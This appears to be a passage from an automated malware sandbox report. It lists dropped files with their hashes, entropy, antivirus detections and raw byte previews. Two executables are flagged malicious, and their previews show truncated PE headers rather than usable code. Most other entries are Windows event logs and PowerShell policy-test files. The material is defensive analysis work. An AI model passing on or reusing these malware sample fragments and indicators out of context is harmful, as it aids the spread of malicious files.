MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfvovuox.s1h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggaxxm3p.4wn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npebohs4.pji.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2c2aex0.puo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wu5tkwpf.kfa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2w3hwzt.2fj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	150528
Entropy (8bit):	5.769203996328619
Encrypted:	false
SSDEEP:	3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
MD5:	658AC2968AC81EADBE165CFD2A770C34
SHA1:	39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
SHA-256:	4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
SHA-512:	CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

Download File

Process:	C:\Users\user\Desktop\zufmUwylvo.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	20970496
Entropy (8bit):	7.80864463332949
Encrypted:	false
SSDEEP:	393216:mE0t6YZQ+hEO1CGk9rNVdXlTvr6EaYOHLfwS1hQeJpsQ:mttRQSYGk9rhh6aQfwQhQ
MD5:	413E4E7BC129E8165D1FFD2B1AE5DB04
SHA1:	1EA09F97D200319F1582AEB8F4084D80B0D61DFA
SHA-256:	B388D2B53453ADD11982A0E5B86EE01BBAF318EE77483300731D2202CE906146
SHA-512:	FB37421F14D673587DF501051C1DE9E36C4DF07B5871AF391E71A6269E5E42BCE70CC7841C6E55D0383871248A4DC520C9DEB1B9E4CFAB4C86BB6C1C21F89DEE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f........../....&.....\[..&..R.]........@..............................@.....R.@... ... ..............................................4^.<.....@..... .@..;..............................................(....................... ............................text... ...........................`..`.data....,Y.........................@....rdata...>....Z.....................@..@.pdata.......0[.....................@..@.xdata..@....P[.....................@..@.bss.....%...`[..........................idata..4.....[.....................@....CRT....`.....[.....................@....tls..........[.....................@....yuZ..........[.....................@..@.e;T....N.....[..................... ..`."Ki....X...........................@.....>f......?.......?.................`..h.rsrc.........@.......?.............@..@................................................

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	72040
Entropy (8bit):	3.97481123457985
Encrypted:	false
SSDEEP:	768:LXHqh2smghIXHqh2smghTrxgVc3gkbBxagkuhcHba5FKcEP5W1Hjr:b+2sg+2sDwcd/3hc7tcEP6
MD5:	A512768ECC880B30B1E73AC2BD4FCA97
SHA1:	33E77B789240929DB698CAD63C09B383DE8F8E55
SHA-256:	27748B01813E6C43108DD573A85AA885A52463FE482B56F6CC9298930EC80C75
SHA-512:	9327D0A3108F5FDBB465369565F21EBB8F24879DEE8482D0A97E4B93FD4A4658523EECBC09FEF809CC89CBBD85D4A377D9F7455423AB09C1D043BFF1A5CBFD85
Malicious:	false
Preview:	ElfChnk.................G.......J...............h............................................................................V..............................................=...........................................................................................................................g...............@...........................n...................M...]...........................f...................................&...........................................~.......................................**..X...G........1..U..........U..&........U..,ho^V......\........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 335, DIRTY
Category:	dropped
Size (bytes):	125040
Entropy (8bit):	4.13144260085388
Encrypted:	false
SSDEEP:	768:DVUHiapX7xadptrDT9W84c+XL2WqVUHiapX7xadptrDT9W84c+XL2W:6Hi6xadptrX9WPB9Hi6xadptrX9WPB
MD5:	C865C7996C773EEB724A8A3A0C4C61F4
SHA1:	9C447A07382D0CFB9FA405AA8F1FAE0D45BFAD48
SHA-256:	F3B4E821054C740548D791BAB53B5327A177B98F370213B59ACA4999A8E9F21E
SHA-512:	574758564CDEE573C1D7DAF97335EC22625D45CF17E12E7B1BC4332EB554476ED73D91E5944E0C590D35FF03B66E70E99F4BCE4CF6C22DD84520335FCD85F60E
Malicious:	false
Preview:	ElfFile.................O...................................................................................................J.4#ElfChnk.........P...............P...........X........g.e......................................................................".................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.382120578185277
Encrypted:	false
SSDEEP:	768:T8wgVFdXH6BGoiwv3SudzEIhAg5+530pDWEAqKG:4rVFdXH6BGoTWfg5+530pD9
MD5:	A9C9467E960F3B3FAD5AA2A6E5E9F12B
SHA1:	704696EE95709D5E7343F021C78793824E8CEA1B
SHA-256:	E32DA9BB844B658ED2BF03FFD0D4871EF175D3E559A27D397C3DE5521525C452
SHA-512:	FCB3242F11BFD7F544CC0D96117AA300E2520DFA8C431B0DD43D22018FE656FBAD606609D777574EA907511083A79A5A3FF01CF172568789840CD985FF173888
Malicious:	false
Preview:	ElfChnk.~...............~.......................0............................................................................GP.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...................US......................UZ..............&............0...........{......................5z..................EW..................**......~........O.s.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66960
Entropy (8bit):	4.249286029565082
Encrypted:	false
SSDEEP:	384:XVKLVLhGVCVEVEVw7VQJVaVZVqVQVjVbVXVEVpg8VNVwVZVkV4VSVsVdVyVfVfV5:QRxgsu
MD5:	3607E78BFBD53FE0091140C14F85A819
SHA1:	5ABB28F514652FCEC30162E4E31F50F9C46EE181
SHA-256:	003CC3100BFBEA5CA2F21A74D259D4D9AE4B6A1D09AA6FE9DFA0EFB2438F12D8
SHA-512:	B5C416AB77F78D8E7E48A8C1B8E82B1BF19718EAC0950DDA12D6CB70D880DD0513A6D5548C1A911E84AD53A5120A1EA7E5306441939F4D7F53D900C17B03C7A7
Malicious:	false
Preview:	ElfChnk.p...............p...................0........Z.........................................................................T........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&.......................q!........................................................U.........1...&...............................................................@.......X...a.!.....E..........@....U....Y..v.......v................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y..........................<6..U.........1.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.419729124261797
Encrypted:	false
SSDEEP:	384:GhomEmXOVmJGmNk4m5TiAmMmqm2mcmWmamqmHjCsmcNmv9mamimfmfm1mlmoAmCy:GJk3TiJKSwTpsc6QfBg8FEy
MD5:	7656BAD2060A2793AA4F6D5D564D9008
SHA1:	BBD13EFAD125D4D2D0868B74294F9ED1A331072F
SHA-256:	63048F8A504251CDCDDDD961909F7044BA02E190A87E39A072B4237F564591AA
SHA-512:	16160D9CA17F4444B6A6A804B132B563FCD0E14D616C4828C19DE41A79ECA102D25BFD6486A065C339B841334223BE54849DC8CC3BA797DDBE2ACF5402F153E5
Malicious:	false
Preview:	ElfChnk../.......0......./.......0..........`...@....!y....................................................................."G.)................h...........................=...........................................................................................................................f...............?...........................m...................M...F...............................S....'...,..................[........7..........3.......K.............A...k#...1..s:......k............v..........**......./......0$4.s.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.5113612162024437
Encrypted:	false
SSDEEP:	96:7+NVaO8sMa3Z85ZMLp3Z85ZRr3Z85ZM3Z85ZHrjj3u3Z85Zu:7IV7pp8nMLpp8nZp8nMp8nLv3up8n
MD5:	E51ED3E427271704ECCD0B47DCD7D6F4
SHA1:	6D49C0F73B890F8B5ADFC9B9DE2FCEA8E1A1AE2E
SHA-256:	340CB004E86ADAE532F579C9EF624828AAF98C70AB72C5812442A48BEB09909A
SHA-512:	69DC3603EEE1EAB8CBB11B2E36A863F4633160FB47CBC88619303032C7A16710D04D54BBC175DDF1D06954F3AF63B1B692F0404C462ADB82EF0E0430383F8077
Malicious:	false
Preview:	ElfChnk.........................................0....yJ........................................................................P............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4592900981827945
Encrypted:	false
SSDEEP:	1536:m8UbBN2A4VD7VAx8whAGU2woJQgh08DOHMOJVA10sk:
MD5:	126180677D28DC497BD408A64EA172E1
SHA1:	BEC15EF64816C36BFDAE0F0FEEB7F4C1DC69C4CD
SHA-256:	5758D0C1BD538F73D7DB6C6A60BA73F75902CDC00D8F218C59D6A9CFB1DAEFD8
SHA-512:	8678457B5D074F775A53AFD661BC542F5F8141C1A10A4A46BA84207EE25C720194C7C98A5CDCAFB119DA988B5E93FE464716D7292ABECF570BD014A82A1C1737
Malicious:	false
Preview:	ElfChnk.e.......h.......e.......h...............p...7..D......................................................................Z.............................................=...............u...........................................................................................................H...............?...............................................M...F.......................................................................&...........................................................j...............*......e.........3.w............&..........-v.W.B.j.GP........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.415159402288347
Encrypted:	false
SSDEEP:	768:GPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9JFlZR19T:KXY5nVYIyyqED5BVZUeAdnYiCqh33DT
MD5:	1FB37D2119F3EE57848F0D67AD48849A
SHA1:	39777540E937BBD0233B8A706416B3032CA1A687
SHA-256:	007EEE68AAA082FF9C775CFA67679FAF3EC8987ACDCFE8A0877CBE960DB207F7
SHA-512:	68C619479B9623D6013D4CCC268287C1A871599F61CD1F2DCF4419CF9F5049C8B4EF413C3FF4BB42EED316B43354416D760A44B22CED3ADD44F36649E9C4D205
Malicious:	false
Preview:	ElfChnk.........x...............x...............x.....E\.....................................................................q?n................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................>.......................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90880
Entropy (8bit):	2.4560656165504304
Encrypted:	false
SSDEEP:	384:Jhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorvorMMocoriorXorKoS/:JDCOziDCOzU
MD5:	2C6021C291424B540ADABDEA27C6B4E8
SHA1:	B69F79E804ACFB9B3725A3F9485428211F6C7D29
SHA-256:	D47F3A95035FF2C244F83B65E29A97E8D923537148120B2DA9EAAAB7EA47C3E6
SHA-512:	7F22AA609ED39DDDD81A2223ABB6962AD644B5931692A658561B49F1803833BFD59B204DF64CDF4C254958EBAA31B69CB491D26240132EADA283BC8D017B01EF
Malicious:	false
Preview:	ElfChnk......................................H...J..........................................................................t.sW................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................2...................................-...............'..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8225690963819652
Encrypted:	false
SSDEEP:	384:nhAiPA5PNPxPEPHPhPEPmPSPRP3PoPPP/yPwLPLP:n2Nq
MD5:	84D9B4178F165CEA4CA029E0D12F4F9E
SHA1:	97AFD3ADC37C23E5BC62CD50E67F3B4736507F81
SHA-256:	297F54B0932E48FD907A267BF946A318701510A176F00D6A5ED94A6450B35C6E
SHA-512:	33143501AF8B77C6AFAFCB627F1B17FF51D9E5B8E80D78E01FA71D0548EB4E8B97F46875D736267B59D381227E48A777C334064E7DFC50E03D3FA385C19124F5
Malicious:	false
Preview:	ElfChnk......................................#...%..r%".........................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8138145107376272
Encrypted:	false
SSDEEP:	384:chZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lc:cWXSYieD+tvgzmMvTah+/
MD5:	93A87B180C69A5903CF9C180BF972B6B
SHA1:	88A81D069CA081738D3B30A0B595B352062A5624
SHA-256:	850089996AF65DB44D822CFDB75CEA9CE8A6A4D37DD93975B4CFAF04F68BF55E
SHA-512:	D54637CB526BAC70688BC922C2643E44B389521B13C12FB4260F899A4989453C43C36552E11C3157DDE20457C780D7C03574BD709A75BB0B57BB838D5979542F
Malicious:	false
Preview:	ElfChnk......................................#...$..f..........................................................................................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................&...............................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67128
Entropy (8bit):	3.0630386371656817
Encrypted:	false
SSDEEP:	384:qhjhEhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRA:FbCyhLfIk2Q9
MD5:	2E9275C68CE4FE20107DD538153C09EE
SHA1:	B265ECEAB891A6C0C9F1B6A283332E7B2E987A83
SHA-256:	1CB5284217EA0235A37F3F129FC6B3AD5C9570438DADBEE1EE4CC80FCA57ED2E
SHA-512:	DB2E5D8481356068996546075AF9872392D1F547C62C8CA7480623D9880D1645092E7C379B8EADE8F2EB0F4FBA54FE327E4E2BF83BFB95D64FA4F2295EDA6AEF
Malicious:	false
Preview:	ElfChnk.........I...............I...................h........................................................................<.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......................~v..............................................................**......H........ .U.........1...~v..............................................................<.......T.....!.................. .U...%.3..NI...hA\.t.......H....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............j...,#..a`hN....$..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\.U.s.e.r.\....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66528
Entropy (8bit):	3.2392372407491683
Encrypted:	false
SSDEEP:	768:UcMhFBuyKskZljdoKXjtT/r18rQXn8+BP7O:xMhFBuV
MD5:	3FA418FABF6DA9164F8E5102C009A296
SHA1:	9A3F39974AC49B190D1467007EAC5F7BADF64030
SHA-256:	3A60D569F39F05D4062D989D6B16322EC60E7B497AE1CE1EB422052E49DEAD4C
SHA-512:	79F01F734966FAE4132561F772721D712DE7C8A054C2ABCC827C0D48D8C5D5E451BC67E41CCFBB7F4ABC8B11A22D2DB85B45CBC17F31FC05D8299FCCF99B0E45
Malicious:	false
Preview:	ElfChnk.........J...............J.....................`.....................................................................u...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**......J...........U.........1...................................................................>.......V...y.!.....................U....3..D..F.8.....-t.......J....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.N.C.r.y.p.t........E..3...pM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.N.C.r.y.p.t./.O.p.e.r.a.t.i.o.n.a.l....M.........F...........M.i.c.r.o.s.o.f.t. .P.l.a.t.f.o.r.m. .C.r.y.p.t.o. .P.r.o.v.i.d.e.r...0...l.s.a.s.s...e.x.e................ElfChnk.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.885034234519396
Encrypted:	false
SSDEEP:	768:ZvAsAkA7QaQ5vAzBCBao/F6Cf2SEqEhwaK41HZaXPVoYNdEfB:eH0
MD5:	714FD4C2865CBCD8C6A8A883AFF1B3BD
SHA1:	103D191E91C5046777FBF0F2EE889F9CE459E841
SHA-256:	C6F89738E810FEA931490B09D832B11EED45F24F838C15E1FA8F80F39C467EB3
SHA-512:	29E2DF7B1264E16BACF1E3FBD51CFB544503C7AFCDE5D7A92DC43059CB72F2E6C8BC2FE76B7EEB23AF5EA855C8AEDA8E52162E00582230D61602641F16F39327
Malicious:	false
